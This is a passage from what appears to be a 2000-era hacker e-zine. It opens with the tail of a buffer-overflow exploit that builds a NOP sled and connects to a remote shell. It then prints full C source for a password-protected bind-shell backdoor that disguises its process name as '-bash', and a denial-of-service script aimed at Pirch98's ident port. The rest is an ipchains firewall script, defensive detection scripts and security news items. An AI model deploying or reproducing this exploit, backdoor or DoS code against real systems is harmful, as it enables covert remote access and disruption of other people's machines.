        if(!(addy+offset & 0xff) || !(addy+offset & 0xff00) || !(addy+offset & 0xff0000) || !(addy+offset & 0xff000000))
        { 
          printf("NULL detected in address\n");
          offset += 1;
        }
      
      
        sploit = nops;
        for(x = 0;x < 200 - strlen(jmpcode);x++)
              *(sploit++) = 0x90;
      
        for(x = 0;x < strlen(jmpcode);x++)
          *(sploit++) = jmpcode[x];
      
        printf("Using address: 0x%x\n",addy+offset);
        addr_ptr = (long *)(sploit++);
        for(x = 0; x < 12;x+=4)
          *(addr_ptr++) = addy + offset;
      
        sprintf(buf,"%s^%s^%s\n",nops,nops, hellshell);
        write(fd,buf,strlen(buf));
      }
      
      int shell(unsigned long addy)
      {
        char buf[1024];
        fd_set set;
        int len,sockfd;
        struct sockaddr_in addr;
      
        addr.sin_family = AF_INET;
        addr.sin_port   = htons(46256);
        addr.sin_addr.s_addr   = addy;
      
        sockfd = socket(AF_INET,SOCK_STREAM,0);
        if(connect(sockfd,(struct sockaddr *)&addr,sizeof(struct sockaddr)) == -1)
        {
          perror("Sploit failed, connect");
          close(sockfd);
          return -1;
        }
        strcpy(buf,"cd /;id;echo \"hehe success, don't do anything nasty\"\n");
        write(sockfd,buf,strlen(buf));
      
        while(1)
        {
          FD_SET(fileno(stdin),&set);
          FD_SET(sockfd,&set);
          select(sockfd+1,&set,NULL,NULL,NULL);
      
          if(FD_ISSET(fileno(stdin),&set))
          {
              memset(buf,NULL,1024);
              fgets(buf,1024,stdin);
              write(sockfd,buf,strlen(buf));
          }
      
          if(FD_ISSET(sockfd,&set))
          {
              memset(buf,NULL,1024);
              if((len = read(sockfd,buf,1024)) == 0)
              {
                  printf("EOF.\n");
                  close(sockfd);
                  exit(-1);
              }
              
              if(len == -1)
              {
                 perror("read");
                 exit(-1);
              }
              puts(buf);
           }
         }      
      }
      
      unsigned long resolve(char *name)
      {
        struct hostent *hp;
        unsigned long ip;
      
        if((ip = inet_addr(name)) == -1)
        {
          if((hp = gethostbyname(name)) == NULL)
          {
              printf("Unable to resolve <%s>\n",name);
              exit(-1);
          }
          memcpy(&ip,hp->h_addr,4);
        }
        return ip;
      }
      
      @HWA      

34.0  Simple Backdoor. Shell on a port with password support by eth0 (b0f)
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Source: http://www.b0f.com/
      
        * Although marked 'private' this was available for public download
        on the b0f site - Ed
    
      
      /* private backdoor for b0f */
      /* coded by eth0 */
      #include <stdio.h>
      #include <stdlib.h>
      #include <errno.h>
      #include <strings.h>
      #include <netinet/in.h>
      #include <sys/socket.h>
      #include <sys/types.h>
      #include <signal.h>
      #define PASSAUTH 1 /* undefine this if you don't want a password at the beginning */
      
      #define PORT            1337 /* define this to whatever you want */
      #define MSG_WELCOME     "[b0f] backd00r, remember that all commands are followed by a ;\n"
      #define MSG_PASSWORD    "Password: "
      #define MSG_WRONGPASS   "Invalid password\n"
      #define MSG_OK          "Welcome...\n"
      #define MSG_CONTINUE    "Do you want to continue?\n"
      
      #define HIDE            "-bash"
      #define SHELL           "/bin/sh"
      
      #ifdef PASSAUTH
              #define PASSWD "app910h"
      #endif
      
      int main (int argc, char *argv[]);
      #ifdef PASSAUTH
      int login (int);
      #endif
      
      int background()
      {
      int pid;
      signal(SIGCHLD,SIG_IGN);
      pid = fork();
      if(pid>0) 
      {
      sleep(1);
      exit(EXIT_SUCCESS);     // parent, exit
      }
      if(pid==0)
      {
      signal(SIGCHLD,SIG_DFL);
      return getpid();                // child, go on
      }
      return -1;                      // fork failed
      }
      
      int
      main (int argc, char *argv[])
      {
              int sockfd, newfd, size;
              struct sockaddr_in local;
              struct sockaddr_in remote;
              char cmd[256];
      
              strcpy (argv[0], HIDE);
              signal (SIGCHLD, SIG_IGN);
      
              bzero (&local, sizeof(local));
              local.sin_family = AF_INET;
              local.sin_port = htons (PORT);
              local.sin_addr.s_addr = INADDR_ANY;
              bzero (&(local.sin_zero), 8);
      
              if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
                      perror("socket");
                      exit(1);
              }
      
              if (bind (sockfd, (struct sockaddr *)&local, sizeof(struct sockaddr)) == -1) {
                      perror("bind");
                      exit(1);
              }
      
              if (listen(sockfd, 5) == -1) {
                      perror("listen");
                      exit(1);
              }
              size = sizeof(struct sockaddr_in);
              background();
              while (1) {
                      if ((newfd = accept (sockfd, (struct sockaddr *)&remote, &size)) == -1) {
                              perror ("accept");
                              exit(1);
                      } 
      
                      if (!fork ()) {
                              send (newfd, MSG_WELCOME, sizeof(MSG_WELCOME), 0);
      
      #ifdef PASSAUTH
                              if (login(newfd) != 1) {
                                      send (newfd, MSG_WRONGPASS, sizeof(MSG_WRONGPASS), 0);
                                      close (newfd);
                                      exit(1);
                              }
      #endif
      
                              close (0); close(1); close(2);
                              dup2 (newfd, 0); dup2(newfd, 1); dup2(newfd, 2);
                              execl (SHELL, SHELL, (char *)0); close(newfd);
      exit(0);
                      }
                      close (newfd);
              }
              return 0;
      }
      
      #ifdef PASSAUTH
      int
      login (int fd)  
      {
              char u_passwd[15];
              int i;
      
              send (fd, MSG_PASSWORD, sizeof(MSG_PASSWORD), 0);
              recv (fd, u_passwd, sizeof(u_passwd), 0);
      
              for (i = 0; i < strlen (u_passwd); i++) {
                      if (u_passwd[i] == '\n' || u_passwd[i] == '\r')
                      u_passwd[i] = '\0';
              }
      
              if (strcmp (PASSWD, u_passwd) == 0) {
                      return 1;
              } else {
                      return 0;
              }
      }
      #endif
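
      Detecting this kind of listener on a host, as an added example (not part
      of eth0's code or the original article): the program overwrites argv[0]
      with "-bash" but cannot change what /proc/<pid>/exe points to, so the
      sketch below flags processes whose argv[0] disagrees with their
      executable and that also own a listening TCP socket. The sample /proc
      tree, PIDs, inode numbers and the path /tmp/.x/bd are constructed.

```shell
#!/bin/sh
# Added example (defensive triage). Flags processes whose argv[0] does not
# match the binary behind /proc/<pid>/exe AND that own a listening TCP socket.
# Only <procroot>/net/tcp (IPv4) is read here; tcp6 is not covered.

# listening_inodes PROCROOT -> "inode hexport" for each socket in LISTEN (0A)
listening_inodes() {
    awk 'NR > 1 && $4 == "0A" { split($2, a, ":"); print $10, a[2] }' \
        "$1/net/tcp" 2>/dev/null
}

# scan_masquerade PROCROOT -> one line "pid argv0 exe port" per suspect
scan_masquerade() {
    sm_root=$1
    sm_listen=$(listening_inodes "$sm_root")
    for sm_dir in "$sm_root"/[0-9]*; do
        # kernel threads and unreadable entries have no exe link
        sm_exe=$(readlink "$sm_dir/exe" 2>/dev/null) || continue
        sm_exe=${sm_exe%' (deleted)'}
        sm_argv0=$(tr '\0' '\n' 2>/dev/null < "$sm_dir/cmdline" | head -n 1)
        [ -n "$sm_argv0" ] || continue
        # a real login shell shows "-bash" for /bin/bash: drop the leading dash
        sm_shown=${sm_argv0#-}
        [ "${sm_shown##*/}" = "${sm_exe##*/}" ] && continue
        # names disagree: report only if the process holds a listening socket
        for sm_fd in "$sm_dir"/fd/*; do
            sm_target=$(readlink "$sm_fd" 2>/dev/null) || continue
            case $sm_target in
                'socket:['*) ;;
                *) continue ;;
            esac
            sm_inode=${sm_target#'socket:['}
            sm_inode=${sm_inode%']'}
            sm_port=$(printf '%s\n' "$sm_listen" |
                awk -v i="$sm_inode" '$1 == i { print $2; exit }')
            [ -n "$sm_port" ] || continue
            printf '%s %s %s %d\n' \
                "${sm_dir##*/}" "$sm_argv0" "$sm_exe" "0x$sm_port"
        done
    done
    return 0
}

# build_sample_proc -> path of a constructed /proc-like tree for offline runs
build_sample_proc() {
    sp=$(mktemp -d) || return 1
    mkdir -p "$sp/net" "$sp/100/fd" "$sp/200/fd" "$sp/300/fd" "$sp/400/fd"
    # 100: genuine login shell, no listener
    printf '%s\0' -bash > "$sp/100/cmdline"
    ln -s /bin/bash "$sp/100/exe"
    ln -s /dev/pts/0 "$sp/100/fd/0"
    # 200: daemon whose name matches its binary, listening on 22
    printf '%s\0' /usr/sbin/sshd -D > "$sp/200/cmdline"
    ln -s /usr/sbin/sshd "$sp/200/exe"
    ln -s 'socket:[5001]' "$sp/200/fd/3"
    # 300: argv[0] says "-bash", binary is something else, listening on 1337
    printf '%s\0' -bash > "$sp/300/cmdline"
    ln -s /tmp/.x/bd "$sp/300/exe"
    ln -s 'socket:[5002]' "$sp/300/fd/3"
    # 400: name mismatch (interpreter) but no listening socket
    printf '%s\0' python3 app.py > "$sp/400/cmdline"
    ln -s /usr/bin/python3.11 "$sp/400/exe"
    ln -s /dev/null "$sp/400/fd/0"
    cat > "$sp/net/tcp" <<'EOF'
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 5001 1 0000000000000000 100 0 0 10 0
   1: 00000000:0539 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 5002 1 0000000000000000 100 0 0 10 0
EOF
    echo "$sp"
}
```

      On a live Linux host, run scan_masquerade /proc as root. Daemons that
      rewrite their own process title will also show up, so treat hits as
      leads to check against an allowlist.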
      
      
      
      @HWA      
      
35.0  Pirch98 ident/fserve daemon DoS attack. by eth0 (b0f)
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Source: http://www.b0f.com/
      
      /* code by eth0 from buffer0verfl0w security */
      /* http://www.b0f.com */
      
      /* 
         *NOTE* code was not tested, this was only coded with the information
                given by Chopsui-cide/MmM '00, use at your own risk
         *NOTE*
      
      Pirch98 ident/fserve daemon DoS attack
       Feb, 20 2000 - 00:05
       contributed by: Chopsui-cide
      
       Pirch98 irc client can be trivially crashed by a simple overflow if
      either the fserve, or ident daemons are active. 
      */
      #include <stdio.h>
      #include <string.h>
      #include <netdb.h>
      #include <netinet/in.h>
      #include <sys/types.h>
      #include <sys/socket.h>
      #include <unistd.h>
      
      #define dport 113 
      #define LEN 512
      int x, s;
      char *str;  /* varying the size would give diff results */
      
      struct sockaddr_in addr, spoofedaddr;
      struct hostent *host;
      
      
      int open_sock(int sock, char *server, int port) {
           struct sockaddr_in blah;
           struct hostent *he;
           bzero((char *)&blah,sizeof(blah));
           blah.sin_family=AF_INET;
           blah.sin_addr.s_addr=inet_addr(server);
           blah.sin_port=htons(port);
      
      
          if ((he = gethostbyname(server)) != NULL) {
              bcopy(he->h_addr, (char *)&blah.sin_addr, he->h_length);
          }
          else {
               if ((blah.sin_addr.s_addr = inet_addr(server)) < 0) {
                 perror("gethostbyname()");
                 return(-3);
               }
          }
      
              if (connect(sock,(struct sockaddr *)&blah,16)==-1) {
                   perror("connect()");
                   close(sock);
                   return(-4);
              }
              printf("Connected to [%s:%d].\n",server,port);
              return;
      }
      
      
      int main(int argc, char *argv[]) {
      
           if (argc != 2) {
              printf("Usage: %s <target>\n",argv[0]);
              exit(0);
           }
      
           if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
              perror("socket()");
              exit(-1);
           }
      
           open_sock(s,argv[1],dport);
      
      
             printf("Sending crash....\n ");
             send(s,str,LEN,0);
             printf("1st crash sent...\n");
             printf("Sending crash....\n");
             send(s,str,LEN,0);
             printf("2nd crash sent...\n");
             printf("Sending crash.... \n");
             send(s,str,LEN,0);
             printf("3rd crash sent...\n");
            
             usleep(100000);
           printf("Done!\n");
           close(s);
      return(0);
      }
      
      @HWA      
      
36.0  Simple ipchains frontend script  by eth0 (b0f)
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      ipchains is a kernel level firewall application for linux.
      
      Source: http://www.b0f.com/
      
      
      #!/bin/sh
      #xxxxxxxxxxxxxxxxxxxxxxxxxxxx
      # buffer0verfl0w security...x
      #     // eth0               x
      #xxxxxxxxxxxxxxxxxxxxxxxxxxxx
      
      # Simple ipchains frontend script to help you configure ipchains
      # for standalone... 
      # usage: simply run...
      
      # ---------------------------------------------------------------- Interfaces -
      # Local Interface
      # This is the interface that is your link to the world
      
      LOCALIF="ppp0"
      
      # ------------------------------------------------------- Variable definition -
      #
      # Set the location of ipchains.
      
      IPCHAINS="/sbin/ipchains"
      
      # You shouldn't need to change anything in the rest of this section
      
      LOCALIP=`ifconfig $LOCALIF | grep inet | cut -d : -f 2 | cut -d \  -f 1`
      LOCALMASK=`ifconfig $LOCALIF | grep Mask | cut -d : -f 4`
      LOCALNET="$LOCALIP/$LOCALMASK"
      
      echo "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
      
      
      echo "[standalone] IP: $LOCALNET"
      
      
      REMOTENET="0/0"
      
      # -------------------------------------- Flush everything, start from scratch -
      
      echo -n "[standalone] Flushing rulesets.."
      
      # Incoming packets from the outside network
      $IPCHAINS -F input
      echo -n "."
      
      # Outgoing packets from the internal network
      $IPCHAINS -F output   
      echo -n "."
      
      echo "Done!"
      
      # -------------------------------------------------- Allow loopback interface -
      
      echo -n "[standalone] Loopback.."
      
      $IPCHAINS -A input -i lo -s 0/0 -d 0/0 -j ACCEPT
      $IPCHAINS -A output -i lo -s 0/0 -d 0/0 -j ACCEPT
      echo -n ".."
      
      echo "Done!"
      
      # ----------------------------------Set telnet, www and FTP for minimum delay -
      # This section manipulates the Type Of Service (TOS) bits of the 
      # packet. For this to work, you must have CONFIG_IP_ROUTE_TOS enabled
      # in your kernel
      
      echo -n "[standalone] TOS flags.."
      
      $IPCHAINS -A output -p tcp -d 0/0 www -t 0x01 0x10
      $IPCHAINS -A output -p tcp -d 0/0 telnet -t 0x01 0x10   
      $IPCHAINS -A output -p tcp -d 0/0 ftp -t 0x01 0x10
      echo -n "..."
      
      # Set ftp-data for maximum throughput
      $IPCHAINS -A output -p tcp -d 0/0 ftp-data -t 0x01 0x08
      echo -n "."
      
      echo "Done!"
      
      # ---------------------------------------------------------- Trusted Networks -
      # Add in any rules to specifically allow connections from hosts/nets that
      # would otherwise be blocked.
      
      # echo -n "[standalone] Trusted Networks.."
      
      # $IPCHAINS -A input -s [trusted host/net] -d $LOCALNET <ports> -j ACCEPT 
      # echo -n "."
      
      # echo "Done!"
      
      # ----------------------------------------------------------- Banned Networks -
      # Add in any rules to specifically block connections from hosts/nets that
      # have been known to cause you problems. These packets are logged.
      
      # echo -n "[standalone] Banned Networks.."
      
      # This one is generic
      # $IPCHAINS -A input -l -s [banned host/net] -d $LOCALNET <ports> -j DENY
      # echo -n "."
      
      # This one blocks ICMP attacks
      # $IPCHAINS -A input -l -b -i $LOCALIF -p icmp -s [host/net] -d $LOCALNET -j DENY
      # echo -n "."
      
      # echo "Done!"
      
      # ------------------------------------------------------ @home-specific rules -
      # This @home stuff is pretty specific to me (terminus).  I get massive port
      # scans from my neighbors and from pokey admins at @home, so I just got harsh
      # and blocked all their stuff, with a few exceptions, listed below.
      #
      # If someone out there finds out the ip ranges of JUST tci@home, let me know
      # so i don't end up blocking ALL cablemodems like it's doing now.
      
      echo -n "[standalone] Cable Modem Nets.."
      
      # so we can check mail, use the proxy server, hit @home's webpage.
      # you will want to set these to your local servers, and uncomment them
      
      # $IPCHAINS -A input -p tcp -s ha1.rdc1.wa.home.com -d $LOCALNET 1023:65535 -j ACCEPT
      # $IPCHAINS -A input -p tcp -s mail.tcma1.wa.home.com -d $LOCALNET 1023:65535 -j ACCEPT
      # $IPCHAINS -A input -p tcp -s www.tcma1.wa.home.com -d $LOCALNET 1023:65535 -j ACCEPT
      # $IPCHAINS -A input -p tcp -s proxy.tcma1.wa.home.com -d $LOCALNET 1023:65535  -j ACCEPT
      # echo -n "...."
      
      # so we can resolve the above hostnames, allow dns queries back to us
      # $IPCHAINS -A input -p tcp -s ns1.home.net -d $LOCALNET 1023:65535 -j ACCEPT
      # $IPCHAINS -A input -p tcp -s ns2.home.net -d $LOCALNET 1023:65535 -j ACCEPT
      # $IPCHAINS -A input -p udp -s ns1.home.net -d $LOCALNET 1023:65535 -j ACCEPT
      # $IPCHAINS -A input -p udp -s ns2.home.net -d $LOCALNET 1023:65535 -j ACCEPT
      # echo -n ".."
      
      # linux ipchains building script page (I think)
      # $IPCHAINS -A input -p tcp -s 24.128.61.117 -d $LOCALNET 1023:65535 -j  ACCEPT
      # echo -n "."
      
      # Non-@home users may want to leave this uncommented, just to block all
      # the wannabe crackers. Add any @home hosts you want to allow BEFORE this line.
      
      # Blast all other @home connections into infinity and log them.
      $IPCHAINS -A input -l -s 24.0.0.0/8 -d $LOCALNET -j DENY
      echo -n "."
      
      echo "Done!"
      
      # ---------------------------- Specific port blocks on the external interface -
      # This section blocks off ports/services to the outside that have
      # vulnerabilities. This will not affect the ability to use these services
      # within your network. 
      
      echo -n "[standalone] Port Blocks.."
       
      # NetBEUI/Samba
      $IPCHAINS -A input -p tcp -s $REMOTENET -d $LOCALNET 139 -j DENY
      $IPCHAINS -A input -p udp -s $REMOTENET -d $LOCALNET 139 -j DENY
      echo -n "."
      
      # Microsoft SQL
      $IPCHAINS -A input -p tcp -s $REMOTENET -d $LOCALNET 1433 -j DENY
      $IPCHAINS -A input -p udp -s $REMOTENET -d $LOCALNET 1433 -j DENY
      echo -n "."
      
      # Postgres SQL
      
      $IPCHAINS -A input -p tcp -s $REMOTENET -d $LOCALNET 5432 -j DENY
      $IPCHAINS -A input -p udp -s $REMOTENET -d $LOCALNET 5432 -j DENY
      echo -n "."
      
      # Network File System
      $IPCHAINS -A input -p tcp -s $REMOTENET -d $LOCALNET 2049 -j DENY
      $IPCHAINS -A input -p udp -s $REMOTENET -d $LOCALNET 2049 -j DENY
      echo -n "."
      
      # X Displays :0-:2-
      $IPCHAINS -A input -p tcp -s $REMOTENET -d $LOCALNET 5999:6003 -j DENY
      $IPCHAINS -A input -p udp -s $REMOTENET -d $LOCALNET 5999:6003 -j DENY
      echo -n "."
      
      # X Font Server :0-:2-
      $IPCHAINS -A input -p tcp -s $REMOTENET -d $LOCALNET 7100 -j DENY
      $IPCHAINS -A input -p udp -s $REMOTENET -d $LOCALNET 7100 -j DENY
      echo -n "."
      
      # Back Orifice (logged)
      $IPCHAINS -A input -l -p tcp -s $REMOTENET -d $LOCALNET 31337 -j DENY
      $IPCHAINS -A input -l -p udp -s $REMOTENET -d $LOCALNET 31337 -j DENY
      echo -n "."
      
      # NetBus (logged)
      $IPCHAINS -A input -l -p tcp -s $REMOTENET -d $LOCALNET 12345:12346 -j DENY
      $IPCHAINS -A input -l -p udp -s $REMOTENET -d $LOCALNET 12345:12346 -j DENY
      echo -n "."
      
      echo "Done!"
      
      # --------------------------------------------------- High Unprivileged ports -
      # These are opened up to allow sockets created by connections allowed by 
      # ipchains
      
      echo -n "[standalone] High Ports.."
      
      $IPCHAINS -A input -p tcp -s $REMOTENET -d $LOCALNET 1023:65535 -j ACCEPT
      $IPCHAINS -A input -p udp -s $REMOTENET -d $LOCALNET 1023:65535 -j ACCEPT
      echo -n "."
      
      echo "Done!"
      
      # ------------------------------------------------------------ Basic Services -
      
      echo -n "[standalone] Services.."
      
      # ftp-data (20) and ftp (21)
      # $IPCHAINS -A input -p tcp -s $REMOTENET -d $LOCALNET 20 -j ACCEPT
      # $IPCHAINS -A input -p tcp -s $REMOTENET -d $LOCALNET 21 -j ACCEPT
      # echo -n ".."
      
      # ssh (22)
      # $IPCHAINS -A input -p tcp -s $REMOTENET -d $LOCALNET 22 -j ACCEPT
      # echo -n "."
      
      # telnet (23)
      # $IPCHAINS -A input -p tcp -s $REMOTENET -d $LOCALNET 23 -j ACCEPT
      # echo -n "."
      
      # smtp (25)
      # $IPCHAINS -A input -p tcp -s $REMOTENET -d $LOCALNET 25 -j ACCEPT
      # echo -n "."
      
      # DNS (53)
      $IPCHAINS -A input -p tcp -s $REMOTENET -d $LOCALNET 53 -j ACCEPT
      $IPCHAINS -A input -p udp -s $REMOTENET -d $LOCALNET 53 -j ACCEPT
      echo -n ".."
      
      # DHCP on LAN side (to make @Home DHCP work) (67/68)
      # $IPCHAINS -A input -i $LOCALIF -p udp -s $REMOTENET -d 255.255.255.255/24 67 -j ACCEPT
      # $IPCHAINS -A output -i $LOCALIF -p udp -s $REMOTENET -d 255.255.255.255/24 68 -j ACCEPT
      # echo -n ".."
      
      # http (80)
      # $IPCHAINS -A input -p tcp -s $REMOTENET -d $LOCALNET 80 -j ACCEPT
      # echo -n "."
      
      # POP-3 (110)
      # $IPCHAINS -A input -p tcp -s $REMOTENET -d $LOCALNET 110 -j ACCEPT
      # echo -n "."
      
      # identd (113)
      $IPCHAINS -A input -p tcp -s $REMOTENET -d $LOCALNET 113 -j REJECT
      echo -n "."
      
      # nntp (119)
      # $IPCHAINS -A input -p tcp -s $REMOTENET -d $LOCALNET 119 -j ACCEPT
      # echo -n "."
      
      # https (443)
      # $IPCHAINS -A input -p tcp -s $REMOTENET -d $LOCALNET 443 -j ACCEPT
      # echo -n "."
      
      # ICQ Services (it's a server service) (4000)
      # $IPCHAINS -A input -p tcp -s $REMOTENET -d $LOCALNET 4000 -j ACCEPT
      # echo -n "."
      
      echo "Done!"
      
      # ---------------------------------------------------------------------- ICMP -
      
      echo -n "[standalone] ICMP Rules.."
      
      # Use this to deny ICMP attacks from specific addresses
      # $IPCHAINS -A input -b -i $LOCALIF -p icmp -s <address> -d 0/0 -j DENY
      # echo -n "."
      
      # Allow incoming ICMP
      $IPCHAINS -A input -p icmp -s $REMOTENET -d $LOCALNET -j ACCEPT
      $IPCHAINS -A input -p icmp -s $REMOTENET -d $LOCALNET -j ACCEPT
      echo -n ".."
      
      # Allow outgoing ICMP
      $IPCHAINS -A output -p icmp -s $LOCALNET -d $REMOTENET -j ACCEPT
      $IPCHAINS -A output -p icmp -s $LOCALNET -d $REMOTENET -j ACCEPT
      echo -n "...."
      
      echo "Done!"
      
      # -------------------------------------------------------- set default policy -
      
      $IPCHAINS -A input -j DENY
      $IPCHAINS -A output -j ACCEPT
      
      echo ""
      echo "[standalone] Finished Establishing Firewall."
      echo "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
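
      ipchains walks a chain top to bottom and the first matching rule decides
      the packet, so the order of the sections above is what defines the
      policy. As an added example (not part of eth0's script), the sketch
      below replays the script's active input rules for a protocol and
      destination port and reports which rule decides. It models only -p, the
      destination port and -j, and assumes the source is outside 24.0.0.0/8
      and the packet did not arrive on lo.

```shell
#!/bin/sh
# Added example: first-match evaluation of the script's active input rules.

# The uncommented "-A input" rules that match on protocol/port, in script
# order. $REMOTENET and $LOCALNET are left unexpanded on purpose.
input_rules() {
cat <<'EOF'
-A input -p tcp -s $REMOTENET -d $LOCALNET 139 -j DENY
-A input -p udp -s $REMOTENET -d $LOCALNET 139 -j DENY
-A input -p tcp -s $REMOTENET -d $LOCALNET 1433 -j DENY
-A input -p udp -s $REMOTENET -d $LOCALNET 1433 -j DENY
-A input -p tcp -s $REMOTENET -d $LOCALNET 5432 -j DENY
-A input -p udp -s $REMOTENET -d $LOCALNET 5432 -j DENY
-A input -p tcp -s $REMOTENET -d $LOCALNET 2049 -j DENY
-A input -p udp -s $REMOTENET -d $LOCALNET 2049 -j DENY
-A input -p tcp -s $REMOTENET -d $LOCALNET 5999:6003 -j DENY
-A input -p udp -s $REMOTENET -d $LOCALNET 5999:6003 -j DENY
-A input -p tcp -s $REMOTENET -d $LOCALNET 7100 -j DENY
-A input -p udp -s $REMOTENET -d $LOCALNET 7100 -j DENY
-A input -l -p tcp -s $REMOTENET -d $LOCALNET 31337 -j DENY
-A input -l -p udp -s $REMOTENET -d $LOCALNET 31337 -j DENY
-A input -l -p tcp -s $REMOTENET -d $LOCALNET 12345:12346 -j DENY
-A input -l -p udp -s $REMOTENET -d $LOCALNET 12345:12346 -j DENY
-A input -p tcp -s $REMOTENET -d $LOCALNET 1023:65535 -j ACCEPT
-A input -p udp -s $REMOTENET -d $LOCALNET 1023:65535 -j ACCEPT
-A input -p tcp -s $REMOTENET -d $LOCALNET 53 -j ACCEPT
-A input -p udp -s $REMOTENET -d $LOCALNET 53 -j ACCEPT
-A input -p tcp -s $REMOTENET -d $LOCALNET 113 -j REJECT
-A input -p icmp -s $REMOTENET -d $LOCALNET -j ACCEPT
-A input -j DENY
EOF
}

# verdict PROTO PORT -> "TARGET N": target and position of the deciding rule
verdict() {
    input_rules | awk -v proto="$1" -v port="$2" '
    {
        p = "all"; lo = 0; hi = 65535; target = ""
        for (i = 1; i <= NF; i++) {
            if ($i == "-p") p = $(i + 1)
            if ($i == "-j") target = $(i + 1)
            # ipchains takes the port (or lo:hi range) right after the -d address
            if ($i == "-d" && i + 2 <= NF && $(i + 2) !~ /^-/) {
                n = split($(i + 2), r, ":")
                lo = r[1]; hi = (n == 2) ? r[2] : r[1]
            }
        }
        if ((p == "all" || p == proto) &&
            port + 0 >= lo + 0 && port + 0 <= hi + 0) {
            print target, NR
            exit
        }
    }'
}
```

      verdict tcp 1337 returns "ACCEPT 17": the "High Ports" rule admits any
      TCP or UDP destination port from 1023 up that the earlier DENY list does
      not name, so an unlisted listener on a high port is reachable from
      outside.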
      
      
      @HWA      
      
37.0  HNN:Feb 14th:Clinton Calls for Cyber Security Summit. 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Joey 
      As many as 20 top Internet executives are expected to
      meet with President Clinton, Attorney General Janet
      Reno and security advisers Tuesday. The
      Internet-security summit with high-tech industry leaders
      will be used to plot a response to this week's stunning
      attacks on the Web's most popular sites. (Hope they
      invite some people who understand the technology so
      that they don't overreact and do something stupid.) 

      WSJ Interactive Edition - via ZD Net        
      http://www.zdnet.com/zdnn/stories/news/0,4586,2436551,00.html?chkpt=zdnntop
      
      @HWA
      
38.0  HNN:Feb 14th:Black, White, Grey, Where Exactly is the Line. 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Adam 
      This New York Times article makes a lot of assumptions
      which we disagree with. The first is that people who
      write security tools should be prosecuted as well as the
      people that use them. This is like blaming car
      manufacturers for auto accidents. When industry has
      proven time and time again that it is not responsive to
      security holes unless it can be proven that the holes do
      in fact exist there is a need, however dangerous, for
      this sort of tool. As for the article's assumption that the
      line between good and bad is somehow getting blurrier
      we feel that it has never been more clear. 

      NY Times       
      http://www.nytimes.com/library/tech/yr/mo/biztech/articles/12hack.html
      (Pay access archives - Ed)
      
      @HWA
      
39.0  HNN:Feb 14th:Italian Cyber Criminals Apprehended 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by rigel 
      Seven Italian cyber criminals were caught by the Italian
      Financial Police last Friday. They have been accused of
      breaking into Swiss Banks, the Universita di Catania,
      Toronto University and others. They have also been
      accused of somehow siphoning money from inter bank
      electronic transfers. The detectives in the case also
      suspect that the group may have broken into web sites
      for money. They have been charged with spying and
      theft of industrial secrets. Officials are still
      investigating. (This information is from a bad
      translation and may not be 100% accurate.) 

      Ilmessaggero - Italian       
      http://www.ilmessaggero.it/hermes/20000212/01_NAZIONALE/INTERNI/Dab.htm
      
      @HWA
      
40.0  HNN:Feb 14th: RealNames Customer Info and CC Numbers Stolen 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Joe 
      RealNames, a company that substitutes complicated
      Web addresses with simple keywords, is warning its
      users that its customer database may have been stolen,
      and that user credit card numbers and passwords may
      have been accessed. (Why are companies storing this
      information? After the transaction is complete they
      have no need to store the number.) 

      C|Net
      http://home.cnet.com/category/0-1005-200-1547688.html
      
      Wired       
      http://www.wired.com/news/business/0,1367,34295,00.html
      
      C|Net
      
      RealNames' customer database hacked 
      By Jim Hu Staff Writer, CNET News.com February 11, 2000, 9:10 a.m. PT 

      RealNames, a company that substitutes complicated Web addresses with 
      simple keywords, is warning its users that its customer database has been 
      hacked, and that user credit card numbers and passwords may have
      been accessed.

      The company informed its customers of the security breach in an email 
      written and sent by RealNames chief executive Keith Teare early this 
      morning. 

      "Within the last 24 hours we have identified a situation that may have 
      resulted in our customer information database being compromised, including 
      customer credit card information," the email read. 

      The attacks occurred late Wednesday afternoon, Teare told CNET News.com. 

      A user can register and pay for keywords on RealNames' Web site via credit 
      card by filling out a form that includes personal information, such as his 
      or her name, address and email address. RealNames then stores that       
      information in a database, just like an e-commerce company or domain name 
      registrar would with a customer making an online purchase or registration.

      The perpetrator was able to access customer records, credit card numbers 
      and passwords. But Teare said there was no evidence that any credit card 
      numbers have been used. The company contacted the FBI and participating       
      credit card companies when the hack was discovered. 

      "We've added further security over the last 48 hours," Teare said. 

      RealNames is enlisting Atlanta-based security firm ISS to conduct an 
      audit, Teare said. 

      The attacks on RealNames were not similar to the distributed denial of 
      service (DDoS) attacks inflicted upon major Web sites such as Yahoo, eBay 
      and Amazon.com earlier this week. Those attacks merely shut down the sites 
      for roughly a three- to five-hour period. The attack on RealNames
      was more "malicious" with an intent on accessing private information, a 
      customer service representative said. 

      In contrast to the DDoS attacks, the attack on RealNames was aimed at 
      breaking into the company's database and redirecting a number of its 
      Internet keyword URLs to a government site in the People's Republic
      of China, Teare said. 

      Because hackers commonly fake an Internet address of origin, Teare could 
      not conclude whether the hacker originated in China. 

      RealNames, based in San Carlos, Calif., has developed a system based on 
      Internet keywords that allows users to type familiar words or phrases to 
      simplify Internet navigation. 

      The concept is designed as an add-on to search engines and directories 
      and to move from point to point on the Internet, the company said. 
      
      Wired;
      
